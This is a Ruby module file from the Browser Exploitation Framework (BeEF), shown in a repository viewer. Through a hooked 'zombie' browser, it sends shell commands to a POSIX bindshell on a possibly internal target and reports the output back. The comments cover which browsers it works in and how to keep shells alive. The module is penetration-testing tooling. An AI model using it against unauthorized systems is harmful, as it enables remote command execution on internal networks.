Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/ipec/inter_protocol_posix_bindshell/module.rb
1154 views
1
#

2
# Copyright (c) 2006-2025 Wade Alcorn - [email protected]

3
# Browser Exploitation Framework (BeEF) - https://beefproject.com

4
# See the file 'doc/COPYING' for copying permission

5
#

6
# [+] Summary:

7
#

8
# Using Inter-protocol Communication (IPC) the zombie browser will send commands to a listening POSIX shell bound on the target specified in the 'Target Address' input. The target address can be on the zombie's subnet which is potentially not directly accessible from the Internet.

9
#

10
# The command results are returned to the BeEF control panel.

11
#

12
# [+] Tested:

13
#

14
# o Working:

15
#   o Mozilla Firefox 6

16
#

17
# o Not Working:

18
#   o Mozilla Firefox 6 with the NoScript extension

19
#   o Internet Explorer 8+

20
#   o Chrome 13

21
#   o Opera 11

22
#   o Safari 5

23
#

24
# [+] Notes:

25
#

26
# o The bindshell is closed once the module has completed. This is necessary otherwise the /bin/sh process will hang. To avoid this issue:

27
#

28
#   o remove the last "& exit" portion of the JavaScript payload. Be aware that this will leave redundant /bin/sh processes running on the target system.

29
#

30
# o The NoScript extension for Firefox aborts the request when attempting to access a host on the internal network and displays the following warning:

31
#

32
#   [ABE] <LOCAL> Deny on {POST http://localhost:4444/index.html?&/bin/sh&& <<< about:blank - 7}

33
#   SYSTEM rule:

34
#   Site LOCAL

35
#   Accept from LOCAL

36
#   Deny

37
#

38
# o Internet Explorer is not supported as IE 8+ does not allow posting data to internal network addresses. Earlier versions of IE have not been tested.

39
#

40
# o Returning the shell command results is not supported in Chrome, Safari and Opera as JavaScript cannot be executed within the bindshell iframe. The shell commands are executed on the target shell however.

41
#

42
# o This module is incompatible with autorun. Upon completing the shell commands it will load the original hooked window in a child iframe resulting in an additional hook. This will result in an infinite loop if this module is set to autorun.

43
#

44


45
class Inter_protocol_posix_bindshell < BeEF::Core::Command

46
  def self.options

47
    [

48
      { 'name' => 'ip', 'ui_label' => 'Target Address', 'value' => 'localhost' },

49
      { 'name' => 'port', 'ui_label' => 'Target Port', 'value' => '4444' },

50
      { 'name' => 'command_timeout', 'ui_label' => 'Timeout (s)', 'value' => '30' },

51
      { 'name' => 'cmd', 'ui_label' => 'Shell Commands', 'description' => 'Enter shell commands to execute. Note: the semicolons are required to seperate commands', 'type' => 'textarea',

52
        'value' => 'echo ID: ; id', 'width' => '200px' },

53
      { 'name' => 'result_size', 'ui_label' => 'Result Size', 'description' => 'Expected maximum size of the result in bytes', 'value' => '1024' }

54
    ]

55
  end

56


57
  def post_execute

58
    content = {}

59
    content['result'] = @datastore['result'] unless @datastore['result'].nil?

60
    content['fail'] = @datastore['fail'] unless @datastore['fail'].nil?

61
    content['fail'] = 'No data was returned.' if content.empty?

62
    save content

63
  end

64
end

65


66